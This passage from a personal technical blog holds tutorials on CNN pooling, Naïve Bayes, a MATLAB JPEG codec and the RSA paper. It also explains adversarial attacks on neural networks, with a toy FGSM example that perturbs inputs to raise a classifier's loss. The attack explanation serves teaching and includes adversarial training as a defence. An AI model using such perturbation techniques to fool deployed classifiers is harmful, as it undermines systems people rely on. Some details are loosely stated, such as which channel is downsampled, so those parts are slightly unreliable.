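```python
from typing import List

Matrix = List[List[int]]


def max_pool(feature: Matrix, size: int = 2) -> Matrix:
    """Keep only the maximum of each non-overlapping size x size window."""
    pooled = []
    for r in range(0, len(feature) - size + 1, size):
        row = []
        for c in range(0, len(feature[0]) - size + 1, size):
            window = [feature[r + i][c + j] for i in range(size) for j in range(size)]
            row.append(max(window))
        pooled.append(row)
    return pooled


feature = [
    [1, 3, 2, 0],
    [4, 2, 1, 5],
    [0, 1, 7, 2],
    [3, 2, 4, 6],
]
pooled = max_pool(feature)
print(pooled)  # [[4, 5], [3, 7]]
```

A 4x4 input becomes 2x2, the same halving that turns 24x24 into 12x12 in the text.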

In the previous diagram, we applied further convolution and pooling, which follow the same process. Finally, the 3x3x12 feature is flattened into a 1x108 linear layer of neurons, which is connected to a classical deep neural network, and the 10 classification results appear in the output layer (1x10).

Conclusion

In this post, we have learned:

The neural network can extract features by altering the convolution kernel matrices through gradient descent in the back-propagation process.
CNN layers usually contain Convolution and Pooling to shrink the huge number of input neurons.
After Convolution and Pooling, the features are usually flattened and connected to fully connected layers.
The CNN architecture employs kernels and subsampling to condense neighborhoods of related pixels, which would otherwise introduce data redundancy.

Understanding Naïve Bayes Algorithm: Play with Probabilities

Ex10si0n Yan — Tue, 14 Feb 2023 21:05:00 GMT

The Naïve Bayes Algorithm, here mainly referring to the Multinomial Naïve Bayes Classifier, is a machine learning algorithm for classification. It is mathematically based on the Bayes Theorem:

$$P(\text{class}|\text{feature}) = \frac{P(\text{feature}|\text{class})P(\text{class})}{P(\text{feature})}$$

It is easy to prove from some prior knowledge of joint probability:

$$P(A\cap B)=P(A|B) \cdot P(B)$$

$$P(A\cap B)=P(B|A) \cdot P(A)$$

Hence, we can connect these two formulas via $P(A\cap B)$:

$$P(A|B) \cdot P(B) = P(B|A) \cdot P(A)$$

Divide both sides by $P(B)$:

$$P(A|B) = \frac{P(B|A) \cdot P(A)}{P(B)}$$

Bayes Theorem

Here is an exercise on Wikipedia: Drug testing

Confusion Matrix, Image from Evidently AI

Suppose, a particular test for whether someone has been using cannabis is 90% sensitive, meaning the true positive rate (TPR) = 0.90. Therefore, it leads to 90% true positive results (correct identification of drug use) for cannabis users.

The test is also 80% specific, meaning true negative rate (TNR) = 0.80. Therefore, the test correctly identifies 80% of non-use for non-users, but also generates 20% false positives, or false positive rate (FPR) = 0.20, for non-users.

Assuming 0.05 prevalence, meaning 5% of people use cannabis, what is the probability that a random person who tests positive is really a cannabis user?

$$P(pred_T|real_T) = 0.9$$

$$P(pred_T|real_F) = 0.2$$

$$P(real_T) = 0.05$$

find $P(real_T|pred_T) = ?$

$$P(real_T|pred_T) = \frac{P(pred_T|real_T)P(real_T)}{P(pred_T)}$$

$$P(pred_T)=P(pred_T|real_T)*P(real_T)+P(pred_T|real_F)*P(real_F)$$

$$P(real_T|pred_T)=\frac{0.9 \times 0.05}{0.05 \times 0.9+0.95 \times 0.2}\approx 0.1915$$
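The same arithmetic can be checked in a few lines of Python. The variable names are chosen here for readability; the numbers are the ones given in the exercise.

```python
sensitivity = 0.90          # P(pred_T | real_T)
false_positive_rate = 0.20  # P(pred_T | real_F)
prevalence = 0.05           # P(real_T)

# Law of total probability: overall chance of a positive test.
p_positive = sensitivity * prevalence + false_positive_rate * (1 - prevalence)

# Bayes Theorem: chance of being a real user given a positive test.
posterior = sensitivity * prevalence / p_positive

print(round(p_positive, 4))  # 0.235
print(round(posterior, 4))   # 0.1915
```

Even with a 90% sensitive test, fewer than one in five positive results belongs to a real user, because non-users vastly outnumber users.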

Classes and Features

The idea here is to find the class of (that is, to classify) a given set of features, where the class is the prediction result and the features are all the attributes of a specific $X$.

For example, the $X_i$ can be the monthly income and marital status of a person, the frequencies of some words in an email, or the number of bedrooms, size, and distance from the subway of a house (which could determine its rent).

Besides, we let $y$ be the result corresponding to these $X_i$'s. For example, the monthly income and marital status of a person may indicate willingness to purchase after seeing an advertisement, and the frequencies of some words (free, refund, paid, special) may indicate a spam email.

Priors

Since we have figured out $X$ (the features) and $y$ (the class), we can obtain the frequencies of $X$ and $y$ from statistics. Mathematically, they are $P(\text{feature}_i) = \frac{n(\text{feature}_i)}{n(\text{all})} $ and $P(\text{class}) = \frac{n(\text{class})}{n(\text{all})}$. These kinds of probabilities are called priors.

According to the Bayes Theorem mentioned before:

$$P(\text{class}|\text{feature}) = \frac{P(\text{feature}|\text{class})P(\text{class})}{P(\text{feature})}$$

The bridge that connects $P(\text{class}|\text{feature})$ and the priors is $P(\text{feature}|\text{class})$. But what is it?

Conditional Probability

In statistics, $P(A|B)$ is a conditional probability: the probability of event $A$ given that event $B$ has occurred. For example, let event B be an earthquake and event A be a tsunami. $P(\text{tsunami}|\text{earthquake})$ is the probability that a tsunami happens given that an earthquake happens. Common sense says $P(\text{tsunami}|\text{earthquake})$ is lower when the earthquake is far from a coast.

Back to feature and class: $P(\text{class}|\text{feature})$ and $P(\text{feature}|\text{class})$ clearly refer to two different conditions. Let us take the following example:

$A=P(\text{is spam}|\text{free, refund, paid, special})$ is the probability that an email is spam given that it contains the words free, refund, paid, special.

$B=P(\text{free, refund, paid, special}|\text{is spam})$ is the probability that an email contains the words free, refund, paid, special given that it is spam (which we already know).

Posteriors

From the previous A and B, we know that B can be easily calculated from given data (in machine learning, we always have some rows of data as algorithm input), which makes it "empirical".

A, in contrast, is the probability that the email is spam given that it contains free, refund, paid, special. When the system reads an email and gets its vocabulary frequencies, each word falls into one of these situations:

free       contains | not contains
refund     contains | not contains
paid       contains | not contains
special    contains | not contains

There could be $2^4$ possible combinations of the 4 words. For all emails, they must meet one of the combinations of these words. Hence, we can get a True-False attributes set for the 4 words.

For example, (True, True, True, False) indicates that the email contains "free", "refund", "paid" but does not contain "special". Then we can get two probabilities.

$$C = P(\text{is spam}|\text{free, refund, paid, not special})$$

$$D = P(\text{is not spam}|\text{free, refund, paid, not special})$$

The task of deciding whether an email that contains free, refund, paid but not special is spam can be converted into finding $\max(C, D)$. If C is larger, the email is more likely to be spam. The classifier can also report the probability that such an email is spam (such as 75%).

Integration

The class-feature $P(\text{class}|\text{feature})$ works as classifier, and it is calculated by Bayes Theorem:

$$P(\text{class}|\text{feature}) = \frac{P(\text{feature}|\text{class})P(\text{class})}{P(\text{feature})}$$

The training process then reduces mathematically to evaluating this formula.

With the aid of the following formulas, which rely on the "naïve" assumption that the features are independent of each other:

$$P(\text{f}|\text{c}) = P(\text{f}_1|\text{c}) \times P(\text{f}_2|\text{c}) \times ... \times P(\text{f}_n|\text{c})$$

$$P(\text{f}) = P(\text{f}_1) \times P(\text{f}_2) \times ... \times P(\text{f}_n)$$

We can multiply the individual probabilities together (a cumulative product) and obtain the posteriors easily.
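To make the formulas concrete, here is a minimal sketch in Python. The priors and word probabilities are made-up numbers for illustration, not values from any data set, and the function names are hypothetical. Instead of computing $P(\text{f})$ as a product, the sketch normalizes by the sum over the classes, a common shortcut that makes the posteriors add up to 1.

```python
from math import prod

# Hypothetical numbers for illustration only (not taken from any data set).
prior = {"spam": 0.4, "ham": 0.6}                # P(class)
likelihood = {                                    # P(word | class)
    "spam": {"free": 0.8, "refund": 0.5},
    "ham": {"free": 0.1, "refund": 0.2},
}

def unnormalized_posterior(words, cls):
    """P(f_1|c) * ... * P(f_n|c) * P(c): the numerator of Bayes' theorem."""
    return prod(likelihood[cls][w] for w in words) * prior[cls]

def classify(words):
    """Return the most probable class and the normalized posteriors."""
    scores = {c: unnormalized_posterior(words, c) for c in prior}
    total = sum(scores.values())                  # stands in for P(feature)
    posteriors = {c: s / total for c, s in scores.items()}
    return max(posteriors, key=posteriors.get), posteriors

label, posteriors = classify(["free", "refund"])
print(label, posteriors)
```

With these assumed numbers the spam score is 0.8 × 0.5 × 0.4 = 0.16 against 0.1 × 0.2 × 0.6 = 0.012 for ham, so the email is labeled as spam.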

Implementation

The code implements a Naïve Bayes classifier that predicts whether a user will purchase after seeing an advertisement, given these features: gender, age, and estimated salary.

The data could be downloaded from: https://raw.githubusercontent.com/Ex10si0n/machine-learning/main/naive-bayes/data.csv

wget https://raw.githubusercontent.com/Ex10si0n/machine-learning/main/naive-bayes/data.csv

Data Preprocessing

The provided code reads data from a CSV file, separates the headers and data, splits it into training and testing sets, and further splits them into features and labels.

Calculate all of the conditional probabilities

Calculate all of the priors

Applying the Bayes Theorem

Result

View full code here:

machine-learning/naive-bayes at main · Ex10si0n/machine-learning


Conclusion

Naïve Bayes is a fast and simple algorithm that requires little training data, making it suitable for large datasets as well as data with limited labeled examples. It can also handle multiple classes, which makes it a popular choice for text classification and spam filtering.

In conclusion, Naïve Bayes is a simple yet powerful algorithm that is widely used in many real-world applications. Despite its "naïve" assumption of independent features, it has proven to be a reliable method for classification in many scenarios.

Gradient Attack: A Brief Explanation on Adversarial Attack

Ex10si0n Yan — Thu, 01 Dec 2022 21:32:00 GMT

The core of a neural network implementation is feedforward and backpropagation. In feedforward, a series of inputs enters a layer and is multiplied by the weights. The weighted values are then added together to get a sum of the weighted inputs. This sum is usually passed through an activation function, which scales the classification sensitivity of each neuron.

If you are not familiar with deep learning and neural networks, I highly recommend reading the previous post: Implementing Neural Networks from Scratch


Backpropagation computes the gradients rapidly. In short, what backpropagation does for us is gradient (slope in higher dimensions) calculation. The procedure is straightforward: by adjusting the weights and biases throughout the network, the desired output can be produced. For example, if the target output of a neuron is 0, the weights and biases inside the network are adjusted to bring the output closer to 0. This is done by minimizing the loss, descending along the gradient of the loss function with respect to each parameter (i.e., the weights and biases) of every neuron in the network.

The gradient calculated in backpropagation depends on each input X. Usually, the parameters (weights and biases) of the network are adjusted against the gradient to minimize the loss function. Conversely, moving in the opposite direction, up the gradient, increases the loss.

Adversarial Attacks

The adversarial vulnerability of deep neural networks has attracted considerable attention in recent years. An adversarial attack is a technique that makes a neural network model produce wrong predictions. For example, as shown in Figure 1, consider a photo of a panda and a CNN model that accurately assigns a panda image the class label “panda”. Adversarial attack techniques (e.g., Fast Gradient Sign Method, 1-pixel attack, and PGD-based attack) can produce a perturbed panda image, called an adversarial example, based on the given panda image and the parameters of the CNN classifier. The difference between the adversarial example and the original image from the dataset is hard for a human to perceive. Nevertheless, the CNN classifier wrongly classifies the perturbed panda image as another target, such as a gibbon.

Generating Adversarial Perturbation

Types of Adversarial Attacks

From the perspective of the intended result, adversarial attacks can be classified into two categories: targeted attacks and untargeted attacks. A targeted attack aims to make the model misclassify an input of a specific class as another given class (the target class). An untargeted attack, on the other hand, has no target class; the goal is simply to make the target model misclassify the input.

From the perspective of access to the model parameters, there are white box and black box attacks. A white box attack is one where everything about the deployed model is known, such as inputs, model structure, and specific model internals like weights or coefficient values. In most cases, this means explicitly that the attacker has access to the internal gradient values of the model. Some researchers also include knowledge of the entire training data set in white box attacks. Conversely, a black box attack is one where the attacker only knows the model inputs and can query for output labels or confidence scores.

FGSM Adversarial Attack

One of the most popular methods for creating adversarial examples is the Fast Gradient Sign Method (FGSM), introduced by Ian Goodfellow et al. The paper showed that FGSM attacks could result in 89.4% misidentification (97.6% confidence) on the original model.

FGSM aims to alter the input of a deep learning model toward maximum loss using the gradients from backpropagation. Assume a neural network with intrinsic parameters $\theta$ (the weights and biases of each neuron) whose loss function is $J(\theta, X, Y)$. The FGSM algorithm calculates the partial derivative of the loss function with respect to the input to get the direction (sign) of the steepest loss increase, and adds this direction multiplied by $\epsilon$ (usually a tiny floating-point number) to each input. Equation 1 describes this procedure mathematically.

$$x_{adv} = x + \epsilon \times sign(\nabla_xJ(\theta, X, Y))$$
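As a minimal sketch of Equation 1, the snippet below applies FGSM to a tiny logistic-regression model instead of a full neural network, so the input gradient can be written by hand: for binary cross-entropy it is $(p - y)\,w$. The weights, bias, input, and the helper names are all hypothetical and chosen only for illustration.

```python
import math

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

def sign(v):
    return (v > 0) - (v < 0)

def loss(w, b, x, y):
    """Binary cross-entropy J(theta, x, y) of a logistic model."""
    p = sigmoid(sum(wi * xi for wi, xi in zip(w, x)) + b)
    return -(y * math.log(p) + (1 - y) * math.log(1 - p))

def fgsm(w, b, x, y, eps):
    """x_adv = x + eps * sign(grad_x J); for this model grad_x J = (p - y) * w."""
    p = sigmoid(sum(wi * xi for wi, xi in zip(w, x)) + b)
    grad_x = [(p - y) * wi for wi in w]
    return [xi + eps * sign(g) for xi, g in zip(x, grad_x)]

# Hypothetical model parameters and input, chosen only for illustration.
w, b = [2.0, -1.0, 0.5], 0.1
x, y = [0.5, 0.2, 0.4], 1
x_adv = fgsm(w, b, x, y, eps=0.1)
print(loss(w, b, x, y), loss(w, b, x_adv, y))   # the second loss is larger
```

Each input component moves by exactly $\epsilon$, yet the loss on the true label goes up, which is the whole point of the attack.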

Linear Explanation of Adversarial Examples

Digital images commonly use 8 bits per pixel, so all information below that precision is discarded. Because the precision of the features is limited, the classifier should not respond differently to two inputs $x$ and $\widetilde{x} = x + \eta$ if every element of the perturbation $\eta$ is smaller than the precision of the features. As long as $\|\eta\|_\infty < \epsilon$, where $\epsilon$ is small enough to be discarded by the classifier, we expect the classifier to assign the same class to $x$ and $\widetilde{x}$. Now consider the dot product between a weight vector $w$ and the adversarial example $\widetilde{x}$:

$$w^\top\widetilde{x} = w^\top x+w^\top \eta$$

If $w$ has $n$ dimensions and the average magnitude of an element of the weight vector is $m$, then assigning $\eta = \epsilon\,\text{sign}(w)$, where $\text{sign}(x) = +1$ for all $x>0$ and $\text{sign}(x) = -1$ for all $x<0$, makes the weighted input $w^\top \widetilde{x}$ grow by $\epsilon m n$. For high-dimensional problems, many infinitesimal changes to $x$ therefore add up to one significant change in the output.
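The growth of $\epsilon m n$ is easy to check numerically. The sketch below uses a hypothetical weight vector with $n = 1000$ entries of magnitude $m = 0.5$ and a perturbation budget of $\epsilon = 0.01$; all three values are assumptions made for the example.

```python
def sign(v):
    return (v > 0) - (v < 0)

# Hypothetical weight vector: n = 1000 entries, each of magnitude m = 0.5.
n, m, eps = 1000, 0.5, 0.01
w = [m if i % 2 == 0 else -m for i in range(n)]

eta = [eps * sign(wi) for wi in w]                # no element exceeds eps
growth = sum(wi * ei for wi, ei in zip(w, eta))   # w^T eta
print(growth, eps * m * n)                        # both are about 5.0
```

No single input changes by more than 0.01, but the weighted sum moves by about 5, and the effect scales linearly with the dimension $n$.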

Adversarial Training

Adversarial examples $\widetilde{x}$ are generated from the input data and the model parameters so that the classifier misclassifies them. Intuitively, however, if we label each $\widetilde{x}$ with its original class and retrain the model on those examples with their correct labels, fine-tuning on numerous adversarial examples should make the model more robust against adversarial attacks.

In 2019, Tasnim et al. ^[1] proposed a data augmentation approach by introducing InvFGSM adversarial learning attack techniques for medical image segmentation, which achieved higher accuracy and robustness.
In 2022, Xie et al. ^[2] introduced AdvProp (Adversarial Propagation) to improve the recognition accuracy on original data by using separate batches for the original data and for adversarial examples generated by PGD attacks. Their framework achieved 85.2% classification accuracy on ImageNet using adversarial training, 0.7% higher than vanilla training.

According to the literature, adversarial training is a plausible way of enhancing the robustness of a model and possibly of increasing model performance, such as accuracy and AUC, although the latter needs further research and experiments.

Implementing JPEG Image Compression Algorithm using MATLAB

Ex10si0n Yan — Mon, 14 Nov 2022 00:00:00 GMT

The JPEG (or JPG) format is not technically a file format, but rather an image compression standard. The JPEG standard is complex, with various options and color space regulations. However, it was not widely adopted. Simultaneously, a simpler version called JFIF was advocated. This is the image compression algorithm commonly referred to as JPEG compression, and the one we will be discussing in this post. It's worth noting that the file extensions .jpeg and .jpg have persisted, even though the underlying algorithm strictly follows JFIF compression.

The Underlying Assumptions of the JPEG Algorithm

The JPEG algorithm is designed specifically for the human eye. It exploits the following biological properties of human sight:

We are more sensitive to the luminance of an image than to its chromatic values.
We are not particularly sensitive to high-frequency content in images.

The algorithm can be neatly illustrated in the following diagram:

Matlab Implementation: Encoder

Assume img is the image we have read in. In JPEG compression, all compression steps are carried out in the YCbCr color space. In this color space, Y is the luminance, Cb is the blue-difference chroma component, and Cr is the red-difference chroma component.

What is YCbCr ? (Color Spaces)


Here is the built-in Matlab code for converting the color space.

YCbCr is a more convenient color space for image compression because it separates an image's luminance from its chromatic strength. Since our eyes are not particularly sensitive to chrominance, we can "downsample" it. Here, we halve the amount of "color" and generate Y_dsp, which represents the downsampled Y. The difference between the original and the downsampled image is imperceptible, as you can see from the result.

Downsampling, Image from pi.math.cornell.edu
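For readers who prefer Python over Matlab, the idea of chroma downsampling can be sketched as follows. This is a simplified illustration, not the code of this post: it keeps every second sample of one chroma channel in both directions, and the 4x4 Cb channel and the function names are hypothetical.

```python
def downsample_2x(channel):
    """Keep every second sample in both directions (simple decimation)."""
    return [row[::2] for row in channel[::2]]

def upsample_2x(channel):
    """Repeat each sample 2x2 to restore the original size (nearest neighbour)."""
    out = []
    for row in channel:
        wide = [v for v in row for _ in range(2)]
        out.append(wide)
        out.append(list(wide))
    return out

# Hypothetical 4x4 Cb channel.
cb = [[100, 102, 110, 112],
      [101, 103, 111, 113],
      [120, 122, 130, 132],
      [121, 123, 131, 133]]
small = downsample_2x(cb)
print(small)                 # [[100, 110], [120, 130]]
print(upsample_2x(small))
```

The downsampled channel stores a quarter of the samples, and the decoder stretches it back before converting to RGB.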

Following the steps, we need to apply the following processes to each 8x8 block in the image. Y_dct is the matrix that contains the frequency-domain representation of the original image for every 8x8 block. In other words, we apply the discrete cosine transform (DCT) to every 8x8 block and store the resulting 8x8 matrices in Y_dct.

Then we apply the DCT inside the preceding triple for loop; this process transforms the original image from the spatial domain to the frequency domain:
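To show what the transform does to a single block, here is a minimal Python sketch of the orthonormal 2D DCT-II and its inverse, written with the direct formula rather than a fast algorithm. It is an illustration under the assumption of 8x8 blocks; the function names are hypothetical and it is not the Matlab code of this post.

```python
import math

N = 8

def alpha(k):
    """Normalization factor of the orthonormal DCT."""
    return math.sqrt(1 / N) if k == 0 else math.sqrt(2 / N)

def dct2(block):
    """Orthonormal 2D DCT-II of an 8x8 block (direct O(N^4) formula)."""
    return [[alpha(u) * alpha(v) * sum(
                block[x][y]
                * math.cos((2 * x + 1) * u * math.pi / (2 * N))
                * math.cos((2 * y + 1) * v * math.pi / (2 * N))
                for x in range(N) for y in range(N))
             for v in range(N)] for u in range(N)]

def idct2(coef):
    """Inverse of dct2: frequency domain back to spatial domain."""
    return [[sum(alpha(u) * alpha(v) * coef[u][v]
                 * math.cos((2 * x + 1) * u * math.pi / (2 * N))
                 * math.cos((2 * y + 1) * v * math.pi / (2 * N))
                 for u in range(N) for v in range(N))
             for y in range(N)] for x in range(N)]

flat = [[50] * N for _ in range(N)]     # a constant block
coef = dct2(flat)
print(round(coef[0][0], 6))             # 400.0: all energy lands in the DC term
```

A flat block has no variation, so every coefficient except the top-left one is (numerically) zero. This is why smooth image regions compress so well after the DCT.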

Quantization is a process in which we take values in a specific range and turn them into a discrete value (also called discretization). Intuitively, after the DCT, quantization converts the higher-frequency coefficients in the output matrix to 0.

Besides, the intensity of quantization determines how much of the image data is retained: the stronger the quantization, the more high-frequency information is lost. This is the reason why JPEG is a lossy compression.

Since we have got the matrix in frequency domain, we could apply quantization using a quantization table Q.
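As a rough Python sketch of this step, the snippet below divides each DCT coefficient by the matching entry of a table Q and rounds the result. The table is the example luminance table commonly quoted from the JPEG standard, which may differ from the one used in this post, and the `scale` parameter is a hypothetical stand-in for a quality coefficient.

```python
# Example luminance quantization table commonly quoted from the JPEG standard.
Q = [
    [16, 11, 10, 16, 24, 40, 51, 61],
    [12, 12, 14, 19, 26, 58, 60, 55],
    [14, 13, 16, 24, 40, 57, 69, 56],
    [14, 17, 22, 29, 51, 87, 80, 62],
    [18, 22, 37, 56, 68, 109, 103, 77],
    [24, 35, 55, 64, 81, 104, 113, 92],
    [49, 64, 78, 87, 103, 121, 120, 101],
    [72, 92, 95, 98, 112, 100, 103, 99],
]

def quantize(coef, q=Q, scale=1.0):
    """Divide each DCT coefficient by its (scaled) table entry and round."""
    return [[round(coef[u][v] / (q[u][v] * scale)) for v in range(8)]
            for u in range(8)]

def dequantize(quant, q=Q, scale=1.0):
    """Approximate the original coefficients again (the rounding error is lost)."""
    return [[quant[u][v] * q[u][v] * scale for v in range(8)] for u in range(8)]

# Hypothetical coefficient block: strong DC, one low and one high frequency.
coef = [[0.0] * 8 for _ in range(8)]
coef[0][0], coef[0][1], coef[7][7] = 400.0, -33.0, 30.0
quant = quantize(coef)
print(quant[0][0], quant[0][1], quant[7][7])   # 25 -3 0
```

The table entries grow toward the bottom-right, so the high-frequency coefficient of 30 is rounded away to 0 while the low-frequency ones survive.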

After quantization, the image has been compressed a lot. However, to compress it even further, we should consider compressing the quantized data using entropy coding (e.g., Huffman coding).

However, since Y_dct is now a 2D matrix, we need to convert it to 1D first. There are many ways of converting a 2D array to 1D. Because of a characteristic of the "DCTed" array, namely that large numbers always lie in the top-left corner, zig-zag is a better choice.

To implement zig-zag, we could declare a zig-zag table as follows.

This table is derived from the zig-zag traversal, which is illustrated in the following diagram. Zig-zag visits the top-left entries first, so the non-zero numbers should lie at the start of the generated 1D array.

Here is the code for zig-zagging.
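In Python, the zig-zag order can also be generated instead of being written out as a table. The sketch below is one possible way to do it, with hypothetical function names: it sorts the indices by anti-diagonal and alternates the direction on every diagonal.

```python
def zigzag_order(n=8):
    """Index pairs (row, col) of an n x n block in zig-zag order."""
    return sorted(
        ((i, j) for i in range(n) for j in range(n)),
        # Same anti-diagonal first; odd diagonals run downwards, even ones upwards.
        key=lambda p: (p[0] + p[1], p[0] if (p[0] + p[1]) % 2 else -p[0]),
    )

def zigzag(block):
    """Flatten a square block into a 1D list."""
    return [block[i][j] for i, j in zigzag_order(len(block))]

def inverse_zigzag(seq, n=8):
    """Rebuild the n x n block from its zig-zag sequence."""
    block = [[0] * n for _ in range(n)]
    for value, (i, j) in zip(seq, zigzag_order(n)):
        block[i][j] = value
    return block

small = [[1, 2, 3],
         [4, 5, 6],
         [7, 8, 9]]
print(zigzag(small))   # [1, 2, 4, 7, 5, 3, 6, 8, 9]
```

The inverse function uses the same order, which is what the decoder needs later on.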

So far, we have turned the 2D Y_dct into Y_lin, a linear 1D array. To handle this 1D array better, two essential parts need to be implemented: DC and AC.

DC is the difference between the first element of Y_lin for the current 8x8 block and the first element for the preceding adjacent block. AC is the rest of the elements (indices 2 to 64) of Y_lin for the current 8x8 block.
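A small Python sketch of this split, assuming each block has already been zig-zagged into a 64-element list and that the first block is differenced against 0 (an assumption made here, as are the names):

```python
def split_dc_ac(blocks):
    """blocks: zig-zagged 64-element lists in scan order.

    Returns the DC differences and the AC parts of all blocks.
    """
    dc_diffs, ac_lists, prev_dc = [], [], 0
    for lin in blocks:
        dc_diffs.append(lin[0] - prev_dc)   # difference to the previous block's DC
        ac_lists.append(lin[1:])            # the remaining 63 coefficients
        prev_dc = lin[0]
    return dc_diffs, ac_lists

# Three hypothetical blocks whose first elements are 25, 27 and 24.
blocks = [[25] + [0] * 63, [27, 1] + [0] * 62, [24] + [0] * 63]
dc, ac = split_dc_ac(blocks)
print(dc)   # [25, 2, -3]
```

Neighbouring blocks usually have similar brightness, so the differences stay small and are cheaper to encode than the raw values.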

AC should be encoded with Run Length Encoding (RLE). If you are not familiar with it, please refer to: filestore.aqa.org.uk (PDF). The code below is an RLE codec.
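For reference, a minimal RLE codec can be sketched in Python as follows. It stores plain (value, run length) pairs, which is a simplification and not necessarily the exact scheme used in this implementation.

```python
def rle_encode(seq):
    """Collapse runs of equal values into (value, run_length) pairs."""
    out = []
    for v in seq:
        if out and out[-1][0] == v:
            out[-1][1] += 1
        else:
            out.append([v, 1])
    return [tuple(p) for p in out]

def rle_decode(pairs):
    """Expand (value, run_length) pairs back into the original sequence."""
    return [v for v, count in pairs for _ in range(count)]

ac = [5, -2, 0, 0, 0, 1, 0, 0]
encoded = rle_encode(ac)
print(encoded)   # [(5, 1), (-2, 1), (0, 3), (1, 1), (0, 2)]
```

After quantization the AC part is mostly zeros, so long zero runs collapse into single pairs.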

Hence, we can apply RLE to AC and append DC and AC to a data payload.

Huffman encoding is a concise and elegant entropy encoding that yields an optimal prefix code and is commonly used for lossless data compression. A simple implementation of Huffman encoding in Python can be found at:

GitHub - Ex10si0n/hzip: a cli tool for zip files written in python


Then we can apply the built-in Huffman encoding to all payloads at once.
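If no built-in is at hand, Huffman coding can be sketched in a few lines of Python with a heap. This is a generic illustration with hypothetical function names; it is neither the Matlab built-in nor the hzip code linked above.

```python
import heapq
from collections import Counter

def huffman_code(symbols):
    """Build a prefix code {symbol: bitstring} from symbol frequencies."""
    freq = Counter(symbols)
    if len(freq) == 1:                        # degenerate case: one distinct symbol
        return {next(iter(freq)): "0"}
    # Heap entries: (weight, tie_breaker, {symbol: code_so_far})
    heap = [(w, i, {s: ""}) for i, (s, w) in enumerate(freq.items())]
    heapq.heapify(heap)
    tie = len(heap)
    while len(heap) > 1:
        w1, _, c1 = heapq.heappop(heap)       # the two lightest subtrees
        w2, _, c2 = heapq.heappop(heap)
        merged = {s: "0" + c for s, c in c1.items()}
        merged.update({s: "1" + c for s, c in c2.items()})
        heapq.heappush(heap, (w1 + w2, tie, merged))
        tie += 1
    return heap[0][2]

def encode(symbols, code):
    return "".join(code[s] for s in symbols)

def decode(bits, code):
    inverse, out, cur = {v: k for k, v in code.items()}, [], ""
    for b in bits:
        cur += b
        if cur in inverse:                    # prefix-free: first match is the symbol
            out.append(inverse[cur])
            cur = ""
    return out

payload = [0, 0, 0, 0, 1, 1, 2, -3]
code = huffman_code(payload)
bits = encode(payload, code)
print(code, bits)
```

The returned dictionary plays the same role as the dict stored in the header: without it, the bit stream cannot be decoded.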

Then we can store dict in the header and bit_stream as the compressed image data, and encapsulate them into a single file. That's it: we have now implemented a JPEG encoder (image to bitstream).

Matlab Implementation: Bit stream

The generated data (the bit stream) should store some information in its header, such as the dictionary header_dict used for Huffman encoding. Moreover, since AC was run-length encoded and then encapsulated with DC inside a payload, there should be a header recording the length of each payload; in this implementation, we use header_ac_seperator to store this information. Besides, the resolution of the original image should also be stored, because without it we cannot determine the row-column ratio of the image when rebuilding it. Finally, the quality coefficient should also be stored in the header, since it is determined only at encoding time.

Matlab Implementation: Decoder

Conversely, to build the JPEG decoder, we just invert these processes. First, after receiving the content of the bit stream, we apply Huffman decoding to it.

Then, referring to header_ac_seperator, we can reconstruct each payload [DC AC] mentioned previously.

Then, we apply the inverse zig-zag using the same zig-zag sequence, inverse quantization, and the inverse DCT.

We can rebuild each block in the image.

To make the iteration work, some iteration variables should be updated during the loop.

Finally, we change the color space from YCbCr to RGB

Run it and have a look.

We can see the image compression ratio by comparing the original headerless image data with the compressed header and content:

   Compression coefficient: 1.1800
Before compression (bytes): 480000
 After compression (bytes): 304188
         Compression ratio: 1.5780
           PSNR value (dB): 65.829

Bingo! We now have a JPEG decoder, built by inverting the encoder design. Take a look at the decoded compressed image.

Before Compression

After Compression

We can see that in the compressed image, the pixels on the edges of the person look quite weird. This is because the DCT is applied per mini-block, and each block rounds its values differently. To compare with the original image, the image difference can be calculated with a threshold of 3.

Now we have visualized the difference between the original and compressed images.

Image Diff

Conclusion

We have implemented a JPEG codec in this tutorial. You have now learned:

YCbCr color space
Discrete Cosine Transform and Inverse Discrete Cosine Transform (to be added)
JPEG encoding process (image to blocks - DCT - quantization - zigzagging - entropy encoding - encapsulation)
JPEG decoding process (decapsulation - entropy decoding - inverse zigzagging - inverse quantization - iDCT - blocks to image)
Some of the JPEG headers

You can find the code on my GitHub via the following link:

GitHub - Ex10si0n/jpeg-codec: MATLAB implementation of a simple JPEG codec


RSA Digital Signatures and Public-Key Cryptosystems

Ex10si0n Yan — Sat, 12 Nov 2022 00:00:00 GMT

This post is a paper review of the RSA algorithm proposed by R. L. Rivest, A. Shamir, and L. Adleman. Their algorithm is widely applied in public-key cryptography to keep data communication secure in network security.

All classical encryption methods (including the NBS standard by IBM) suffer from the "key distribution problem." The problem is that before a private communication can begin, another private transaction is necessary to distribute corresponding encryption and decryption keys to the sender and receiver, respectively. Typically a private courier is used to carry a key from the sender to the receiver. Such a practice is not feasible if an electronic mail system is to be rapid and inexpensive. A public-key cryptosystem, in contrast, needs no private couriers: the encryption keys can be distributed over the insecure communications channel.

Public Key Cryptosystems

RSA is an implementation of a "public-key cryptosystem". The concept of a "public-key cryptosystem" was introduced by Diffie and Hellman [1]. Such a cryptosystem should have these properties:

(a) D(E(M)) = M
(b) Both D and E are easy to compute (low time complexity)
(c) Publicly revealing E does not reveal an easy way to compute D, so the process is efficient only with E for encryption and D for decryption
(d) E(D(M)) = M

A function $E$ that satisfies (a), (b), and (c) is a "trap-door one-way function"; if it also satisfies (d), it is a "trap-door one-way permutation". The two "trap-door one-way" concepts are introduced in [1]. In the reviewed paper, the authors explain that a function is "one-way" since it is easy to compute in one direction but very difficult to compute in the reverse direction. The function is called "trap-door" since its inverse is easy to compute once certain private "trap-door" information is known.

Assume Alice has a secret decryption function $D_A$ and a public encryption function $E_A$ which can be called by anyone. Similarly, Bob has a private $D_B$ and a public $E_B$. If Bob wants to send a private message to Alice in a public-key cryptosystem, he first retrieves $E_A$ from the public record. Then he sends Alice the encrypted message $E_A(M)$. On her side, Alice deciphers the message by calculating $D_A(E_A(M)) = M$. By property (c), only Alice can decipher $E_A(M)$, because only she holds $D_A$. This process maintains private communication between Alice and Bob without a prior private transaction (a symmetric-key exchange).

Signatures

In the previous example, Bob could guarantee the message could only be seen by Alice since Bob uses $E_A$ to encrypt the message. However, from Alice's perspective, she could not guarantee that the message was from the real Bob.

To implement signatures, the public-key cryptosystem must be implemented with trap-door one-way permutations (decrypted message could be encrypted with $E$) since the decryption algorithm will be applied to unenciphered messages. Bob can prove himself as real by computing his "signature":

$$S=D_B(M)$$

